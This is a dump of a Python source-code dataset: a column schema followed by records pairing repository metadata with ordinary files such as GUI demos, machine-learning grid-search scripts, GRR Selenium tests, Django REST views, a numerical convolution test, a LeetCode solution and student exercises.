Column schema (name, dtype, observed min/max):

blob_id               string         length 40–40
directory_id          string         length 40–40
path                  string         length 3–288
content_id            string         length 40–40
detected_licenses     list           length 0–112
license_type          string         2 classes
repo_name             string         length 5–115
snapshot_id           string         length 40–40
revision_id           string         length 40–40
branch_name           string         684 classes
visit_date            timestamp[us]  2015-08-06 10:31:46 – 2023-09-06 10:44:38
revision_date         timestamp[us]  1970-01-01 02:38:32 – 2037-05-03 13:00:00
committer_date        timestamp[us]  1970-01-01 02:38:32 – 2023-09-06 01:08:06
github_id             int64          4.92k – 681M
star_events_count     int64          0 – 209k
fork_events_count     int64          0 – 110k
gha_license_id        string         22 classes
gha_event_created_at  timestamp[us]  2012-06-04 01:52:49 – 2023-09-14 21:59:50
gha_created_at        timestamp[us]  2008-05-22 07:58:19 – 2023-08-21 12:35:19
gha_language          string         147 classes
src_encoding          string         25 classes
language              string         1 class
is_vendor             bool           2 classes
is_generated          bool           2 classes
length_bytes          int64          128 – 12.7k
extension             string         142 classes
content               string         length 128 – 8.19k
authors               list           length 1–1
author_id             string         length 1–132
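Each record below follows this schema: provenance metadata fields first, then the raw file content. As a minimal sketch of how rows with this schema can be inspected with the Hugging Face `datasets` library — the dataset identifier used here is a placeholder, since the actual Hub name is not given in this dump:

import itertools
from datasets import load_dataset

# Hypothetical dataset ID; substitute the real Hub path of this dataset.
ds = load_dataset("org/python-source-files", split="train", streaming=True)

# Print provenance metadata and a content preview for the first few records.
for row in itertools.islice(ds, 3):
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
    print(row["content"][:200])  # first 200 characters of the stored source file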
8332e30937e9e1b5e5122db696b4431f00c38374
6223dc2e5de7921696cb34fb62142fd4a4efe361
/.metadata/.plugins/org.eclipse.core.resources/.history/51/40e6c6177739001412b5c17ef71e72e3
6db0fb731998676d3ddb05dbce7d5249db6922c6
[]
no_license
Mushirahmed/python_workspace
5ef477b2688e8c25b1372f546752501ee53d93e5
46e2ed783b17450aba29e4e2df7b656522b2b03b
refs/heads/master
2021-03-12T19:24:50.598982
2015-05-25T10:23:54
2015-05-25T10:23:54
24,671,376
0
1
null
2015-02-06T09:27:40
2014-10-01T08:40:33
Python
UTF-8
Python
false
false
1,442
#!/usr/bin/env python

import wx

def slider(parent, min, max, callback):
    """
    Return a wx.Slider object.

    @param min: minimum slider value
    @type min: float
    @param max: maximum slider value
    @type max: float
    @param callback: function of one arg invoked when slider moves.
    @rtype: wx.Slider
    """
    new_id = wx.NewId()
    s = wx.Slider(parent, new_id, (max+min)/2, min, max,
                  wx.DefaultPosition, wx.Size(250, -1),
                  wx.SL_HORIZONTAL | wx.SL_LABELS)
    wx.EVT_COMMAND_SCROLL(parent, new_id,
                          lambda evt: callback(evt.GetInt()))
    return s

# ----------------------------------------------------------------
# Demo app
# ----------------------------------------------------------------

if __name__ == '__main__':
    from gnuradio.wxgui import stdgui2

    # Note: the original referenced `stdgui` despite importing `stdgui2`;
    # the references below use the imported name.
    class demo_graph(stdgui2.gui_flow_graph):
        def __init__(self, frame, panel, vbox, argv):
            stdgui2.gui_flow_graph.__init__(self, frame, panel, vbox, argv)
            vbox.Add(slider(panel, 23, 47, self.my_callback1), 1, wx.ALIGN_CENTER)
            vbox.Add(slider(panel, -100, 100, self.my_callback2), 1, wx.ALIGN_CENTER)

        def my_callback1(self, val):
            print "cb1 = ", val

        def my_callback2(self, val):
            print "cb2 = ", val

    def main():
        app = stdgui2.stdapp(demo_graph, "Slider Demo")
        app.MainLoop()

    main()
532a4c353a1544432b498ed028eb0f65b6b9fc4d
e2860eb874db045fb8d0279566a935af907e5bdf
/ml/ml07_1_boston.py
b245a54bef04d78667e33b52f33e63088f0a8179
[]
no_license
MinseokCHAE/Bitcamp2_new
dda7990907cb136c2e709a345eec634dfdb6ac02
849adb5a330b621f1c681f0b5e92005d1281a44d
refs/heads/main
2023-08-31T03:28:18.068561
2021-10-05T00:48:52
2021-10-05T00:48:52
390,228,262
0
0
null
null
null
null
UTF-8
Python
false
false
1,847
py
import numpy as np
import time
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler, StandardScaler, RobustScaler, QuantileTransformer, OneHotEncoder
from sklearn.datasets import load_boston
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Input, Conv1D, Flatten, MaxPooling1D, GlobalAveragePooling1D, Dropout
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.utils import to_categorical

#1. data preprocessing
boston = load_boston()
x = boston.data
y = boston.target

x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=21)

scaler = MinMaxScaler()
scaler.fit(x_train)
x_train = scaler.transform(x_train)
x_test = scaler.transform(x_test)

from sklearn.model_selection import KFold, cross_val_score, GridSearchCV
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import accuracy_score

n_splits = 5
kfold = KFold(n_splits=n_splits, shuffle=True, random_state=21)

parameter = [
    {'n_estimators': [100, 200]},
    {'max_depth': [6, 8, 10, 12]},
    {'min_samples_leaf': [3, 5, 7, 10]},
    {'min_samples_split': [2, 3, 5, 10]},
    {'n_jobs': [-1, 2, 4]}
]

model = RandomForestRegressor()
grid = GridSearchCV(model, parameter, cv=kfold)
grid.fit(x_train, y_train)

best_estimator = grid.best_estimator_
best_score = grid.best_score_
# y_pred = grid.predict(x_test)
# acc_score = accuracy_score(y_test, y_pred)
grid_score = grid.score(x_test, y_test)

print('best parameter = ', best_estimator)
print('best score = ', best_score)
# print('acc score = ', acc_score)
print('grid score = ', grid_score)

# best parameter =  RandomForestRegressor(min_samples_split=5)
# best score =  0.830591307770115
# grid score =  0.8783616408326427
a161266ee413fb7f3bb8b94466c9d03314de7ee9
633b695a03e789f6aa644c7bec7280367a9252a8
/lmfit_gallery/documentation/fitting_withreport.py
412f4c07159b2a6fb06c2af10b0d239b29d68e3f
[]
no_license
tnakaicode/PlotGallery
3d831d3245a4a51e87f48bd2053b5ef82cf66b87
5c01e5d6e2425dbd17593cb5ecc973982f491732
refs/heads/master
2023-08-16T22:54:38.416509
2023-08-03T04:23:21
2023-08-03T04:23:21
238,610,688
5
2
null
null
null
null
UTF-8
Python
false
false
1,206
py
""" doc_fitting_withreport.py ========================= """ # <examples/doc_fitting_withreport.py> from numpy import exp, linspace, pi, random, sign, sin from lmfit import Parameters, fit_report, minimize p_true = Parameters() p_true.add('amp', value=14.0) p_true.add('period', value=5.46) p_true.add('shift', value=0.123) p_true.add('decay', value=0.032) def residual(pars, x, data=None): """Model a decaying sine wave and subtract data.""" vals = pars.valuesdict() amp = vals['amp'] per = vals['period'] shift = vals['shift'] decay = vals['decay'] if abs(shift) > pi/2: shift = shift - sign(shift)*pi model = amp * sin(shift + x/per) * exp(-x*x*decay*decay) if data is None: return model return model - data random.seed(0) x = linspace(0.0, 250., 1001) noise = random.normal(scale=0.7215, size=x.size) data = residual(p_true, x) + noise fit_params = Parameters() fit_params.add('amp', value=13.0) fit_params.add('period', value=2) fit_params.add('shift', value=0.0) fit_params.add('decay', value=0.02) out = minimize(residual, fit_params, args=(x,), kws={'data': data}) print(fit_report(out)) # <end examples/doc_fitting_withreport.py>
06683c64c9c082713d0b286d60bf3d006bef3569
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
/python/NicolasHug_Surprise/Surprise-master/examples/grid_search_usage.py
f915af8c2eff0478eb4c7a991024a2a4e4aa1ff3
[]
no_license
LiuFang816/SALSTM_py_data
6db258e51858aeff14af38898fef715b46980ac1
d494b3041069d377d6a7a9c296a14334f2fa5acc
refs/heads/master
2022-12-25T06:39:52.222097
2019-12-12T08:49:07
2019-12-12T08:49:07
227,546,525
10
7
null
2022-12-19T02:53:01
2019-12-12T07:29:39
Python
UTF-8
Python
false
false
1,150
py
""" This module describes how to manually train and test an algorithm without using the evaluate() function. """ from __future__ import (absolute_import, division, print_function, unicode_literals) from surprise import GridSearch from surprise import SVD from surprise import Dataset param_grid = {'n_epochs': [5, 10], 'lr_all': [0.002, 0.005], 'reg_all': [0.4, 0.6]} grid_search = GridSearch(SVD, param_grid, measures=['RMSE', 'FCP']) # Prepare Data data = Dataset.load_builtin('ml-100k') data.split(n_folds=3) grid_search.evaluate(data) # best RMSE score print(grid_search.best_score['RMSE']) # >>> 0.96117566386 # combination of parameters that gave the best RMSE score print(grid_search.best_params['RMSE']) # >>> {'reg_all': 0.4, 'lr_all': 0.005, 'n_epochs': 10} # best FCP score print(grid_search.best_score['FCP']) # >>> 0.702279736531 # combination of parameters that gave the best FCP score print(grid_search.best_params['FCP']) # >>> {'reg_all': 0.6, 'lr_all': 0.005, 'n_epochs': 10} import pandas as pd # noqa results_df = pd.DataFrame.from_dict(grid_search.cv_results) print(results_df)
0359e9366c572e840e6a924176a959c6c328847d
e3c8f786d09e311d6ea1cab50edde040bf1ea988
/Incident-Response/Tools/grr/grr/server/grr_response_server/gui/selenium_tests/report_test.py
1175096622c718b20aa9b0c66c5f1c953997a6f7
[ "Apache-2.0", "MIT" ]
permissive
foss2cyber/Incident-Playbook
d1add8aec6e28a19e515754c6ce2e524d67f368e
a379a134c0c5af14df4ed2afa066c1626506b754
refs/heads/main
2023-06-07T09:16:27.876561
2021-07-07T03:48:54
2021-07-07T03:48:54
384,988,036
1
0
MIT
2021-07-11T15:45:31
2021-07-11T15:45:31
null
UTF-8
Python
false
false
4,588
py
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals

from absl import app
from selenium.webdriver.common import keys

from grr_response_core.lib import rdfvalue
from grr_response_server import data_store
from grr_response_server.gui import gui_test_lib
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import test_lib


def AddFakeAuditLog(user=None, router_method_name=None):
  data_store.REL_DB.WriteAPIAuditEntry(
      rdf_objects.APIAuditEntry(
          username=user,
          router_method_name=router_method_name,
      ))


class TestReports(gui_test_lib.GRRSeleniumTest):
  """Test the reports interface."""

  def testReports(self):
    """Test the reports interface."""
    with test_lib.FakeTime(
        rdfvalue.RDFDatetime.FromHumanReadable("2012/12/14")):
      AddFakeAuditLog(user="User123")

    with test_lib.FakeTime(
        rdfvalue.RDFDatetime.FromHumanReadable("2012/12/22")):
      AddFakeAuditLog(user="User456")

    # Make "test" user an admin.
    self.CreateAdminUser(u"test")

    self.Open("/#/stats/")

    # Go to reports.
    self.Click("css=#MostActiveUsersReportPlugin_anchor i.jstree-icon")
    self.WaitUntil(self.IsTextPresent, "Server | User Breakdown")

    # Enter a timerange that only matches one of the two fake events.
    self.Type("css=grr-form-datetime input", "2012-12-21 12:34")
    self.Click("css=button:contains('Show report')")

    self.WaitUntil(self.IsTextPresent, "User456")
    self.assertFalse(self.IsTextPresent("User123"))

  def testReportsDontIncludeTimerangesInUrlsOfReportsThatDontUseThem(self):
    client_id = self.SetupClient(0)
    self.AddClientLabel(client_id, u"owner", u"bar")

    self.Open("/#/stats/")

    # Go to reports.
    self.Click("css=#MostActiveUsersReportPlugin_anchor i.jstree-icon")
    self.WaitUntil(self.IsTextPresent, "Server | User Breakdown")

    # Default values aren't shown in the url.
    self.WaitUntilNot(lambda: "start_time" in self.GetCurrentUrlPath())
    self.assertNotIn("duration", self.GetCurrentUrlPath())

    # Enter a timerange.
    self.Type("css=grr-form-datetime input", "2012-12-21 12:34")
    self.Type("css=grr-form-duration input", "2w")
    self.Click("css=button:contains('Show report')")

    # Reports that require timeranges include nondefault values in the url when
    # `Show report' has been clicked.
    self.WaitUntil(lambda: "start_time" in self.GetCurrentUrlPath())
    self.assertIn("duration", self.GetCurrentUrlPath())

    # Select a different report.
    self.Click("css=#LastActiveReportPlugin_anchor i.jstree-icon")
    self.WaitUntil(self.IsTextPresent, "Client | Last Active")

    # The default label isn't included in the url.
    self.WaitUntilNot(lambda: "bar" in self.GetCurrentUrlPath())

    # Select a client label.
    self.Select("css=grr-report select", "bar")
    self.Click("css=button:contains('Show report')")

    # Reports that require labels include them in the url after `Show report'
    # has been clicked.
    self.WaitUntil(lambda: "bar" in self.GetCurrentUrlPath())
    # Reports that dont require timeranges don't mention them in the url.
    self.assertNotIn("start_time", self.GetCurrentUrlPath())
    self.assertNotIn("duration", self.GetCurrentUrlPath())

    # Select a different report.
    self.Click("css=#GRRVersion7ReportPlugin_anchor i.jstree-icon")
    self.WaitUntil(self.IsTextPresent, "Active Clients - 7 Days Active")

    # The label is cleared when report type is changed.
    self.WaitUntilNot(lambda: "bar" in self.GetCurrentUrlPath())
    self.assertNotIn("start_time", self.GetCurrentUrlPath())
    self.assertNotIn("duration", self.GetCurrentUrlPath())


class TestDateTimeInput(gui_test_lib.GRRSeleniumTest):
  """Tests datetime-form-directive."""

  def testInputAllowsInvalidText(self):
    # Make "test" user an admin.
    self.CreateAdminUser(u"test")

    # Open any page that shows the datetime-form-directive.
    self.Open("/#/stats/HuntApprovalsReportPlugin")

    datetime_input = self.WaitUntil(self.GetVisibleElement,
                                    "css=grr-form-datetime input")
    value = datetime_input.get_attribute("value")
    self.assertRegex(value, r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}")
    self.assertStartsWith(value, "20")

    datetime_input.send_keys(keys.Keys.BACKSPACE)
    self.WaitUntilNot(self.IsTextPresent, value)
    self.assertEqual(value[:-1], datetime_input.get_attribute("value"))


if __name__ == "__main__":
  app.run(test_lib.main)
c8401e8e3188c1d22ddcee1a2d85035f8bdfab43
de0ea898d18e4faf383d230cf2542335bfa166d5
/library/views.py
877c529b48ed090292c6dd4c1e2631133c9a939e
[]
no_license
msadour/book_API
86121341e66249b51835e5e1c842c8fdde26ba6c
81477c242647c95897a05ad892bc3e11542defa7
refs/heads/master
2022-12-09T16:33:12.027427
2020-01-22T13:25:45
2020-01-22T13:25:45
231,387,598
0
0
null
2022-12-07T23:21:19
2020-01-02T13:28:36
HTML
UTF-8
Python
false
false
989
py
# -*- coding: utf-8 -*-
"""
Views.
"""

from __future__ import unicode_literals

from rest_framework import viewsets
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated

from .permissions import IsOwnerOrReadOnly
from .models import Book
from .serializers import BookSerializer


class HelloView(APIView):
    """
    Display the message 'Hello World!' if the permission allows us.
    """
    permission_classes = (IsAuthenticated,)

    def get(self, request):
        content = {'message': 'Hello, World!'}
        return Response(content)


class BookViewSet(viewsets.ModelViewSet):
    """
    Display book(s) if the permission allows us.
    """
    queryset = Book.objects.all()
    serializer_class = BookSerializer
    permission_classes = [IsAuthenticated,
                          permissions.IsAuthenticatedOrReadOnly,
                          IsOwnerOrReadOnly]
6b59d53ff5dca12c2cf49ecda84be12a1c60a12c
a3644ed207867df4d78a04af39ac3e26f86f9012
/ibvp/language/symbolic/util.py
cf587104d319938fea973aba507443ccc906a896
[ "MIT" ]
permissive
ibvp/ibvp
006887be85a37ac4da51664d5fec9244c446cacd
c758b150cbd822bd17444499bea29c53b0606327
refs/heads/master
2022-05-07T02:17:46.232332
2022-03-20T19:34:13
2022-03-20T19:34:13
21,990,116
1
1
null
null
null
null
UTF-8
Python
false
false
2,418
py
from __future__ import division
from __future__ import absolute_import
from six.moves import range

__copyright__ = "Copyright (C) 2010-2013 Andreas Kloeckner"

__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""

import numpy as np


def pretty(expr):
    from ibvp.language.symbolic.mappers import PrettyStringifyMapper
    stringify_mapper = PrettyStringifyMapper()
    from pymbolic.mapper.stringifier import PREC_NONE
    result = stringify_mapper(expr, PREC_NONE)

    splitter = "="*75 + "\n"

    cse_strs = stringify_mapper.get_cse_strings()
    if cse_strs:
        result = "\n".join(cse_strs)+"\n"+splitter+result

    return result


def join_fields(*args):
    from pytools.obj_array import make_obj_array, log_shape
    from pymbolic.geometric_algebra import MultiVector, bit_count

    res_list = []
    for arg in args:
        if isinstance(arg, list):
            res_list.extend(arg)

        elif isinstance(arg, MultiVector):
            for grade in arg.all_grades():
                for bits in range(2**arg.space.dimensions):
                    if bit_count(bits) == grade:
                        res_list.append(arg.data.get(bits, 0))

        elif isinstance(arg, np.ndarray):
            if log_shape(arg) == ():
                res_list.append(arg)
            else:
                res_list.extend(arg.flat)

        else:
            res_list.append(arg)

    return make_obj_array(res_list)
d699aa415671a09c0d3cb6f790fbd8d199a1e504
7b6377050fba4d30f00e9fb5d56dfacb22d388e1
/numericalFunctions/ptwXY/Python/Test/UnitTesting/convolution/convolution.py
23e1f84ea78f302c6955c15e21ec6115a7eb5cc4
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
LLNL/fudge
0a4fe8e3a68b66d58e42d1f4d209ea3f713c6370
6ba80855ae47cb32c37f635d065b228fadb03412
refs/heads/master
2023-08-16T21:05:31.111098
2023-08-01T22:09:32
2023-08-01T22:09:32
203,678,373
21
4
NOASSERTION
2023-06-28T20:51:02
2019-08-21T23:22:20
Python
UTF-8
Python
false
false
3,194
py
# <<BEGIN-copyright>>
# Copyright 2022, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# <<END-copyright>>

import os

from numericalFunctions import pointwiseXY_C

if( 'CHECKOPTIONS' in os.environ ) :
    options = os.environ['CHECKOPTIONS'].split( )
    if( '-e' in options ) : print( __file__ )

CPATH = '../../../../Test/UnitTesting/convolution'

os.system( 'cd %s; ./convolution -v > v' % CPATH )

f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )

line = 1

def getIntegerValue( name, ls ) :
    global line
    s = "# %s = " % name
    n = len( s )
    if( ls[0][:n] != s ) : raise Exception( '%s: line at %s does not contain %s info: "%s"' % ( __file__, line, name, ls[0][:-1] ) )
    value = int( ls[0].split( '=' )[1] )
    line += 1
    return( ls[1:], value )

def getDoubleValue( name, ls ) :
    global line
    s = "# %s = " % name
    n = len( s )
    if( ls[0][:n] != s ) : raise Exception( '%s: line at %s does not contain %s info: "%s"' % ( __file__, line, name, ls[0][:-1] ) )
    value = float( ls[0].split( '=' )[1] )
    line += 1
    return( ls[1:], value )

def compareValues( label, i, v1, v2 ) :
    sv1, sv2 = '%.12g' % v1, '%.12g' % v2
    sv1, sv2 = '%.8g' % float( sv1 ), '%.8g' % float( sv2 )
    if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
    if( sv1 != sv2 ) : raise Exception( '%s: values %s %s diff by %g at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )

def getData( ls, accuracy ) :
    global line
    i = 0
    for l in ls :
        if( l.strip( ) != '' ) : break
        i = i + 1
    line += i
    ls = ls[i:]
    ls, length = getIntegerValue( 'length', ls )
    data = [ list( map( float, ls[i].split( )[:2] ) ) for i in range( length ) ]
    data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, accuracy = accuracy )
    line += length
    return( ls[length:], data )

def getDatas( ls ) :
    global line
    i = 0
    for l in ls :
        if( l.strip( ) != '' ) : break
        i = i + 1
    line += i
    ls = ls[i:]
    if( len( ls ) == 0 ) : return( ls )
    if( ls[0][:9] == '# Area = ' ) : ls = ls[1:]
    if( len( ls ) == 0 ) : return( ls )
    label, ls = ls[0], ls[1:]
    if( label[:10] != '# label = ' ) : raise Exception( '%s: invalid label = "%s"' % ( __file__, label[:-1] ) )
    line += 1
    label = label.split( '=' )[1].strip( )
    ls, mode = getIntegerValue( 'mode', ls )
    ls, accuracy = getDoubleValue( 'accuracy', ls )
    ls, self = getData( ls, accuracy )
    ls, other = getData( ls, accuracy )
    ls, cConvolution = getData( ls, accuracy )
    convolution = self.convolute( other, mode )
    if( len( convolution ) != len( cConvolution ) ) : raise Exception( '%s: len( convolution ) = %d != len( cConvolution ) = %d for label "%s"' % ( __file__, len( convolution ), len( cConvolution ), label ) )
    for i, dXY in enumerate( convolution ) :
        gXY = cConvolution[i]
        compareValues( label, i, dXY[0], gXY[0] )
        compareValues( label, i, dXY[1], gXY[1] )
    return( ls )

while( len( ls ) ) : ls = getDatas( ls )
87d8617072a506c92696bd2d28771c0581767428
cc578cec7c485e2c1060fd075ccc08eb18124345
/cs15211/FlattenNestedListIterator.py
a0f0bfde784f7bd127acc87b7ee70a319e0c47be
[ "Apache-2.0" ]
permissive
JulyKikuAkita/PythonPrac
18e36bfad934a6112f727b4906a5e4b784182354
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
refs/heads/master
2021-01-21T16:49:01.482561
2019-02-07T06:15:29
2019-02-07T06:15:29
91,907,704
1
1
Apache-2.0
2019-02-07T06:15:30
2017-05-20T18:12:53
Python
UTF-8
Python
false
false
5,253
py
__source__ = 'https://leetcode.com/problems/flatten-nested-list-iterator/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/flatten-nested-list-iterator.py
# Time:  O(n), n is the number of the integers.
# Space: O(h), h is the depth of the nested lists.
#
# Description: Leetcode # 341. Flatten Nested List Iterator
#
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
#
# """
# class NestedInteger(object):
#     def isInteger(self):
#         """
#         @return True if this NestedInteger holds a single integer, rather than a nested list.
#         :rtype bool
#         """
#
#     def getInteger(self):
#         """
#         @return the single integer that this NestedInteger holds, if it holds a single integer
#         Return None if this NestedInteger holds a nested list
#         :rtype int
#         """
#
#     def getList(self):
#         """
#         @return the nested list that this NestedInteger holds, if it holds a nested list
#         Return None if this NestedInteger holds a single integer
#         :rtype List[NestedInteger]
#         """
#
# Companies
# Google Facebook Twitter
# Related Topics
# Stack Design
# Similar Questions
# Flatten 2D Vector Zigzag Iterator Mini Parser Array Nesting
#
import unittest


class NestedIterator(object):
    def __init__(self, nestedList):
        """
        Initialize your data structure here.
        :type nestedList: List[NestedInteger]
        """
        self.__depth = [[nestedList, 0]]

    def next(self):
        """
        :rtype: int
        """
        nestedList, i = self.__depth[-1]
        self.__depth[-1][1] += 1
        return nestedList[i].getInteger()

    def hasNext(self):
        """
        :rtype: bool
        """
        while self.__depth:
            nestedList, i = self.__depth[-1]
            if i == len(nestedList):
                self.__depth.pop()
            elif nestedList[i].isInteger():
                return True
            else:
                self.__depth[-1][1] += 1
                self.__depth.append([nestedList[i].getList(), 0])
        return False

# Your NestedIterator object will be instantiated and called as such:
# i, v = NestedIterator(nestedList), []
# while i.hasNext(): v.append(i.next())


class TestMethods(unittest.TestCase):
    def test_Local(self):
        self.assertEqual(1, 1)


if __name__ == '__main__':
    unittest.main()

Java = '''
# Thought:
/**
 * // This is the interface that allows for creating nested lists.
 * // You should not implement it, or speculate about its implementation
 * public interface NestedInteger {
 *
 *     // @return true if this NestedInteger holds a single integer, rather than a nested list.
 *     public boolean isInteger();
 *
 *     // @return the single integer that this NestedInteger holds, if it holds a single integer
 *     // Return null if this NestedInteger holds a nested list
 *     public Integer getInteger();
 *
 *     // @return the nested list that this NestedInteger holds, if it holds a nested list
 *     // Return null if this NestedInteger holds a single integer
 *     public List<NestedInteger> getList();
 * }
 */

# 3ms 94.48%
public class NestedIterator implements Iterator<Integer> {
    private Stack<Iterator<NestedInteger>> stack;
    Integer nextInteger;

    public NestedIterator(List<NestedInteger> nestedList) {
        stack = new Stack<>();
        if (nestedList != null) {
            stack.push(nestedList.iterator());
        }
    }

    @Override
    public Integer next() {
        return nextInteger;
    }

    @Override
    public boolean hasNext() {
        while (!stack.isEmpty()) {
            Iterator<NestedInteger> iter = stack.peek();
            if (!iter.hasNext()) {
                stack.pop();
                continue;
            }
            NestedInteger nextVal = iter.next();
            if (nextVal.isInteger()) {
                nextInteger = nextVal.getInteger();
                return true;
            } else {
                stack.push(nextVal.getList().iterator());
            }
        }
        return false;
    }
}

/**
 * Your NestedIterator object will be instantiated and called as such:
 * NestedIterator i = new NestedIterator(nestedList);
 * while (i.hasNext()) v[f()] = i.next();
 */

# 2ms 100%
class NestedIterator implements Iterator<Integer> {
    List<NestedInteger> nestedList;
    List<Integer> list = new ArrayList<Integer>();
    int index;

    private void help(List<NestedInteger> input) {
        // List<Integer> res = new ArrayList<Integer>();
        for (NestedInteger item : input) {
            if (item.isInteger()) {
                list.add(item.getInteger());
            } else {
                help(item.getList());
            }
        }
        // System.out.println(res.toString());
        // return res;
    }

    public NestedIterator(List<NestedInteger> nestedList) {
        this.nestedList = nestedList;
        index = 0;
        help(nestedList);
    }

    @Override
    public Integer next() {
        return list.get(index++);
    }

    @Override
    public boolean hasNext() {
        if (index < list.size()) {
            return true;
        }
        return false;
    }
}
'''
904ddc6a110c928eecd9ed053afa3bf80f4931a3
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/25/usersdata/98/11884/submittedfiles/av1_3.py
e38e0f0784c64456ff7dcadb762460593411b8a4
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
274
py
# -*- coding: utf-8 -*-
from __future__ import division
import math

a = int(input('Digite o valor de a: '))
b = int(input('Digite o valor de b: '))
i = 1
cont = 0
c = 0
while True:
    if a % i == 0 and b % i == 0:
        cont = cont + 1
        c = i
    i = i + 1
    if i == a or i == b:
        break
961a831640d66bdb4e7113ccbc8e41fd17b88923
a61263850fe63de61ec3004519f0d9aa69f104ac
/python_Algorithm/battle19/TaxiFee.py
e10f3b4d5de684c4e63460e0d62861c606b5a984
[]
no_license
Kimhyeonsuk/Programmers_Python
dd0e13ef6690cfab0c46a7c8b07a5f3b40175071
cc5687c8db2cfa098602829dec3acbf17c5c2177
refs/heads/master
2023-07-16T22:30:29.457419
2021-09-02T10:40:56
2021-09-02T10:40:56
355,876,212
0
0
null
null
null
null
UTF-8
Python
false
false
607
py
def solution(n, s, a, b, fares):
    answer = 1e9
    board = [[1e9 for _ in range(n + 1)] for _ in range(n + 1)]
    for fare in fares:
        board[fare[0]][fare[1]] = fare[2]
        board[fare[1]][fare[0]] = fare[2]
    for i in range(1, n + 1):
        board[i][i] = 0

    # Floyd-Warshall all-pairs shortest paths
    for k in range(1, n + 1):
        for i in range(1, n + 1):
            for j in range(1, n + 1):
                if board[i][j] > board[i][k] + board[k][j]:
                    board[i][j] = board[i][k] + board[k][j]

    # Cheapest split point k: ride together from s to k, then separately to a and b.
    for k in range(1, n + 1):
        answer = min(answer, board[s][k] + board[k][a] + board[k][b])

    return answer
e50e19db7754f252118d5e3c69541abe67d0fdab
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/42/usersdata/69/21660/submittedfiles/jain.py
34c02d431af79001b4eb9414ce0115cad59ff0fc
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
1,090
py
# -*- coding: utf-8 -*-
from __future__ import division
import funcoes
'''
ENTRADA TESTE
f = 0.2
dH = 5
L = 3250
Q = 0.005
g = 9.81
v = 0.000001
e = 0.00006
k = 10
A saida para esta entrada é aproximadamente: 0.1247 (D) e 0.0224 (f)
'''
f = 0.2
dH = input('Digite a perda de carga: ')
L = input('Digite o comprimento da tubulação: ')
Q = input('Digite a vazão: ')
g = input('Digite a gravidade: ')
v = input('Digite a viscosidade cinemática: ')
e = input('Digite a rugosidade absoluta: ')
k = 10
# start here
import math

def diametro(fn, L, Q, dH):
    Diam = ((8*fn*L*Q*Q)/(math.pi*math.pi*dH*g))**(1/5)
    return Diam

def Reynalds(Q, D, v):
    R = 4*Q/(math.pi*D*v)
    return R

def atrito(Rey, E, D):
    s = (E/(3.7*D)) + (5.74/(Rey**0.9))
    t = (2500/Rey)**6
    f = (((64/Rey)**8) + 9.5*((math.log(s) - t)**(-16)))**0.125
    return f

fn = f  # seed the iteration with the initial guess (the original used fn before assigning it)
for i in range(0, k, 1):
    D = diametro(fn, L, Q, dH)
    Rey = Reynalds(Q, D, v)
    fn = atrito(Rey, e, D)
    if 0.000001 <= (e/D) <= 0.01 and 5000 <= Rey <= 100000000:
        if fn == f:
            break
        else:
            f = fn

print('%.10f' % f)
print('%.10f' % D)
3b12aa23f81a807198b89b5e8f7d0a2eec9c9ecd
1419418226b6ba0f510649daaf62b71554cc2284
/amatrice/project_GPS_M5.3_M5.8.py
5aabd4ea3ee678dc37aff80268eb4ebefda90005
[]
no_license
shineusn/mylife
2ef48a777e39be2ef746c3dad16ea963d5b23e5e
61dfa72d9047551746d26b7fe01fb5c2f1f0657a
refs/heads/master
2020-03-22T13:44:42.422127
2018-02-13T18:09:43
2018-02-13T18:09:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
